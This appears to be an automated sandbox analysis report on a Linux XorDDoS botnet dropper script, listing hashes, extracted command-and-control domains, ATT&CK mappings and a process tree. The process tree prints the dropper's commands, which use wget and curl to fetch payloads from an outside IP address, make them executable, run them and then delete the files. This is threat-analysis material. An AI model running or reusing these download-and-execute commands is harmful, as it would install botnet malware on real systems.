Analysis
-
max time kernel
149s -
max time network
147s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240508-en -
resource tags
-
submitted
22-12-2024 07:59
General
-
Target
112.sh
-
Size
318B
-
MD5
0368897400a135549c0a2d9d83d384cc
-
SHA1
29c933b2a8dd201b4aaea73789664dda02c2fe75
-
SHA256
ec991cf6eac0354077622d016f3408b35372c4bbb44e86bc250bc1fcbafedfc4
-
SHA512
00216c30c5ab73b63821846febd159ac0be3c5a6658921ce9753c858ff2f83d698518c67283a9b2bea9da6067698b1302b6d84bf65ada476aba60bc35eedd758
Malware Config
Extracted
xorddos
api.markerbio.com:112
api.enoan2107.com:112
http://qq.com/lib.asp
-
crc_polynomial
CDB88320
Signatures
-
XorDDoS
Botnet and downloader malware targeting Linux-based operating systems and IoT devices.
-
XorDDoS payload 2 IoCs
-
Xorddos family
-
File and Directory Permissions Modification 1 TTPs 2 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 64 IoCs
-
Executes dropped EXE 64 IoCs
-
Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Modifies init.d 2 TTPs 1 IoCs
Adds/modifies system service, likely for persistence.
-
Writes file to system bin folder 64 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to shm directory 3 IoCs
Malware can drop malicious files in the shm directory which will run directly from RAM.
-
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/112.sh/tmp/112.sh1⤵
-
/usr/bin/wgetwget http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/1122⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x 1122⤵
- File and Directory Permissions Modification
-
-
/tmp/112./1122⤵
- Deletes itself
- Executes dropped EXE
- Writes file to system bin folder
-
-
/usr/bin/wgetwget http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://43.249.172.195:888/112s2⤵
- Writes file to tmp directory
-
-
/bin/chmodchmod +x 112s2⤵
- File and Directory Permissions Modification
-
-
/tmp/112s./112s2⤵
- Executes dropped EXE
- Writes file to shm directory
-
-
/bin/rmrm -rf 112.sh2⤵
-
-
/bin/rmrm -rf 1122⤵
-
-
/bin/rmrm -rf 112s2⤵
-
-
/bin/mfnkzmtfdzkb/bin/mfnkzmtfdzkb1⤵
- Executes dropped EXE
- Creates/modifies Cron job
- Enumerates active TCP sockets
- Modifies init.d
- Writes file to system bin folder
- Reads system network configuration
- Reads runtime system information
- Writes file to shm directory
-
/bin/wydvsoynqgbrm/bin/wydvsoynqgbrm -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/nkhvwc/bin/nkhvwc -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/lshzldytuwhip/bin/lshzldytuwhip -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/cgdnymmm/bin/cgdnymmm -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/wycrhnyxtxkde/bin/wycrhnyxtxkde -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/hllqvczscdjksj/bin/hllqvczscdjksj -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/lgurmcttfg/bin/lgurmcttfg -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/tuhihpwufr/bin/tuhihpwufr -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/aqdtxjoqd/bin/aqdtxjoqd -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/gjzluldfurlo/bin/gjzluldfurlo -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/rucllp/bin/rucllp -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/tpuwkuhbmm/bin/tpuwkuhbmm -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/nbomjidolfwc/bin/nbomjidolfwc -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/nwfbhxfcozabtj/bin/nwfbhxfcozabtj -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/gvdvyrkib/bin/gvdvyrkib -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ynuvpx/bin/ynuvpx -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/nfnwcsysu/bin/nfnwcsysu -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/tpjxvgatft/bin/tpjxvgatft -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/pvsnkmk/bin/pvsnkmk -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/jxoqkksf/bin/jxoqkksf -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/nzkgovgmbifick/bin/nzkgovgmbifick -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/zcnjoxmzwaqh/bin/zcnjoxmzwaqh -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/kmwxni/bin/kmwxni -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/bdonewup/bin/bdonewup -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/emzibkybwa/bin/emzibkybwa -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/yqgkcsgcfqkjty/bin/yqgkcsgcfqkjty -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/awtpxzdykfligh/bin/awtpxzdykfligh -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/diaksfebhmrtx/bin/diaksfebhmrtx -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/rvnnqcmsf/bin/rvnnqcmsf -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/cmwksfvynvkgaq/bin/cmwksfvynvkgaq -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/jcaczntxajnev/bin/jcaczntxajnev -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/mihyeutmp/bin/mihyeutmp -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/zmdhpv/bin/zmdhpv -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/pftbpbc/bin/pftbpbc -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/yytdziyylj/bin/yytdziyylj -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/xvioqhctrrojso/bin/xvioqhctrrojso -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/wtbzvxysfmi/bin/wtbzvxysfmi -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/xqnvoyfcp/bin/xqnvoyfcp -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/odgitrciwzalwq/bin/odgitrciwzalwq -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/bvaprvrsqoqi/bin/bvaprvrsqoqi -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/cslsvtcpkezi/bin/cslsvtcpkezi -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/zvcrgd/bin/zvcrgd -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/jtfemxxanfy/bin/jtfemxxanfy -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ebgqkbwrnv/bin/ebgqkbwrnv -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/yjmvcokptjxykt/bin/yjmvcokptjxykt -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/plvocv/bin/plvocv -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/orcfdran/bin/orcfdran -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/yzjbdljwxm/bin/yzjbdljwxm -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/vqiauzahpbg/bin/vqiauzahpbg -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/ozpeqaaefx/bin/ozpeqaaefx -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/emmpijbcaar/bin/emmpijbcaar -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/sugxzeduunx/bin/sugxzeduunx -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/mzxdag/bin/mzxdag -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/gsqvcawea/bin/gsqvcawea -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/xgrrnqq/bin/xgrrnqq -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/tnpgkgujfz/bin/tnpgkgujfz -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/lesfuojwmn/bin/lesfuojwmn -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/llhccwsvpnigtu/bin/llhccwsvpnigtu -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/pfuorhum/bin/pfuorhum -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/paynomozzvbd/bin/paynomozzvbd -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/tygiiodcdsi/bin/tygiiodcdsi -d 15111⤵
- Deletes itself
- Executes dropped EXE
-
/bin/jzgdlvun/bin/jzgdlvun -d 15111⤵
- Deletes itself
-
/bin/iciwdjtfmkalsj/bin/iciwdjtfmkalsj -d 15111⤵
- Deletes itself
-
/bin/gmylhgkshtvvoq/bin/gmylhgkshtvvoq -d 15111⤵
-
/bin/kaouysdrx/bin/kaouysdrx -d 15111⤵
-
/bin/bzdtiybxwpgcz/bin/bzdtiybxwpgcz -d 15111⤵
-
/bin/msvhjltv/bin/msvhjltv -d 15111⤵
-
/bin/islaxexphyucj/bin/islaxexphyucj -d 15111⤵
-
/bin/egptou/bin/egptou -d 15111⤵
-
/bin/minhryv/bin/minhryv -d 15111⤵
-
/bin/tislws/bin/tislws -d 15111⤵
-
/bin/crakqvmzoqhfl/bin/crakqvmzoqhfl -d 15111⤵
-
/bin/bijjxqavnn/bin/bijjxqavnn -d 15111⤵
-
/bin/yfeuapyrpij/bin/yfeuapyrpij -d 15111⤵
-
/bin/vianpibmj/bin/vianpibmj -d 15111⤵
-
/bin/vvgoxdbktzsxvs/bin/vvgoxdbktzsxvs -d 15111⤵
-
/bin/ujecvozd/bin/ujecvozd -d 15111⤵
-
/bin/nvzohkzffftfi/bin/nvzohkzffftfi -d 15111⤵
-
/bin/pdwhbrbpnl/bin/pdwhbrbpnl -d 15111⤵
-
/bin/sgkrlbe/bin/sgkrlbe -d 15111⤵
-
/bin/cusovxwa/bin/cusovxwa -d 15111⤵
-
/bin/bkosokare/bin/bkosokare -d 15111⤵
-
/bin/groajwkdknhsre/bin/groajwkdknhsre -d 15111⤵
-
/bin/fzhdczeoo/bin/fzhdczeoo -d 15111⤵
-
/bin/caztea/bin/caztea -d 15111⤵
-
/bin/zdwsuacbbmffll/bin/zdwsuacbbmffll -d 15111⤵
-
/bin/biychsi/bin/biychsi -d 15111⤵
-
/bin/yrcjpo/bin/yrcjpo -d 15111⤵
-
/bin/ugdyqs/bin/ugdyqs -d 15111⤵
-
/bin/csrymlaooeavj/bin/csrymlaooeavj -d 15111⤵
-
/bin/hdprctzwc/bin/hdprctzwc -d 15111⤵
-
/bin/skoqaiedavdm/bin/skoqaiedavdm -d 15111⤵
-
/bin/edyidut/bin/edyidut -d 15111⤵
-
/bin/dzlubgvzig/bin/dzlubgvzig -d 15111⤵
-
/bin/twlvfpa/bin/twlvfpa -d 15111⤵
-
/bin/mewukzuueq/bin/mewukzuueq -d 15111⤵
-
/bin/ujxqusxlt/bin/ujxqusxlt -d 15111⤵
-
/bin/ytmloprlq/bin/ytmloprlq -d 15111⤵
-
/bin/yhtowlb/bin/yhtowlb -d 15111⤵
-
/bin/xzdtlcofges/bin/xzdtlcofges -d 15111⤵
-
/bin/caxxlblqkq/bin/caxxlblqkq -d 15111⤵
-
/bin/pvymotenez/bin/pvymotenez -d 15111⤵
-
/bin/sqsmgq/bin/sqsmgq -d 15111⤵
-
/bin/jfofeavzgidg/bin/jfofeavzgidg -d 15111⤵
-
/bin/hgcfuesmokxic/bin/hgcfuesmokxic -d 15111⤵
-
/bin/uiktsphz/bin/uiktsphz -d 15111⤵
-
/bin/emmyshnirk/bin/emmyshnirk -d 15111⤵
-
/bin/ueleogydoxzxt/bin/ueleogydoxzxt -d 15111⤵
-
/bin/huuoeywj/bin/huuoeywj -d 15111⤵
-
/bin/nytlhb/bin/nytlhb -d 15111⤵
-
/bin/vpsnwfx/bin/vpsnwfx -d 15111⤵
-
/bin/qokubokhnnxmo/bin/qokubokhnnxmo -d 15111⤵
-
/bin/gikebyne/bin/gikebyne -d 15111⤵
-
/bin/juiysowigk/bin/juiysowigk -d 15111⤵
-
/bin/cnjmuyzukqrqyd/bin/cnjmuyzukqrqyd -d 15111⤵
-
/bin/fwzzym/bin/fwzzym -d 15111⤵
-
/bin/bbkirvcctwq/bin/bbkirvcctwq -d 15111⤵
-
/bin/kjgldrbwjbzgd/bin/kjgldrbwjbzgd -d 15111⤵
-
/bin/kxsimcuxjic/bin/kxsimcuxjic -d 15111⤵
-
/bin/slunpwglmw/bin/slunpwglmw -d 15111⤵
-
/bin/jhihasgud/bin/jhihasgud -d 15111⤵
-
/bin/jynlxvqandvcu/bin/jynlxvqandvcu -d 15111⤵
-
/bin/wzrhhtlrr/bin/wzrhhtlrr -d 15111⤵
-
/bin/epwwrmzmovg/bin/epwwrmzmovg -d 15111⤵
-
/bin/cqicip/bin/cqicip -d 15111⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Privilege Escalation
Boot or Logon Autostart Execution
1Boot or Logon Initialization Scripts
1RC Scripts
1Scheduled Task/Job
1Cron
1Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
549KB
MD519780849cc764ddbbb9de27fb91c9358
SHA1edb58e4d579a11047e0e28edceacb4ce1c7777f0
SHA256a342c6238fdfde156355a45f95d18e5dfd962584419069d2fe202d4b4a06e88a
SHA5120c41641a43f4a83fee41e73f87091366e4a1055739128f956050ed10f80a2c705dfd471ef457158c4f9321f74ea869f5b59f31c3dee678d2750bc9d1cf60e063
-
Filesize
16B
MD5076933ff9904d1110d896e2c525e39e5
SHA14188442577fa77f25820d9b2d01cc446e30684ac
SHA2564cbbd8ca5215b8d161aec181a74b694f4e24b001d5b081dc0030ed797a8973e0
SHA5126fcee9a7b7a7b821d241c03c82377928bc6882e7a08c78a4221199bfa220cdc55212273018ee613317c8293bb8d1ce08d1e017508e94e06ab85a734c99c7cc34
-
Filesize
149B
MD546f59ce3ae78cdd1a4c927a3c92c37e6
SHA1652f2f4a7be4b57912318ab3d15a04f347a66dac
SHA256b55ae1959ceb3e24717767e78946caf16b76124e1df1433e2de8db1ffa97d623
SHA5128a6eb599f6e9356bce6b2cb0631a2ca56285ca5c2985dab07a4f964cfabfe3b459b57b57b6681ddfce98c75de08c3c9084842cd98bcfbb57bdb432d1ab32875a
-
Filesize
32B
MD562f88f6c86f16bf058da6022661c6880
SHA1b32fe31ec7b7d68d668e175d06cf923d3e53dcbc
SHA2560814654f642b468163c735e2ae94f8d023dabbd41caba3ba6d2824ec8108edad
SHA5121802c0973a29e23668c154b07f15b490a3b9cb943ea56884f5be2529666bfbd5e6464cdd6e6f606c44d4e1bc8357cf7b05d09b6cd22940e2f8bbdbf2c712fe1b
-
Filesize
348B
MD53ad64614032e9ccf4830e5139551d6be
SHA10d34f853f12e7312b187309faa4f93a6fc943672
SHA2560f250a4cfdbc2e03147ecb90741ac7872a10bacb69864add607fe690b1aea5fb
SHA512d134a8147da4034988f5b561099d197929f05933a6d85c2614cbf93af82e8c6b76779d095c3f3ce90370c1a04326360c31a9084561e34abc9f9a822d2934cce3
-
Filesize
549KB
MD5f9191bab1e834d4aef3380700639cee9
SHA19c20269df6694260a24ac783de2e30d627a6928a
SHA256ea40ecec0b30982fbb1662e67f97f0e9d6f43d2d587f2f588525fae683abea73
SHA5123d2758fe2d06183e627b5cc24919c08c84108f2efd7ab0a162029d55537476410d9535d50f3eb059f7153f7482c134284862eea121201f82838aace4b12283b5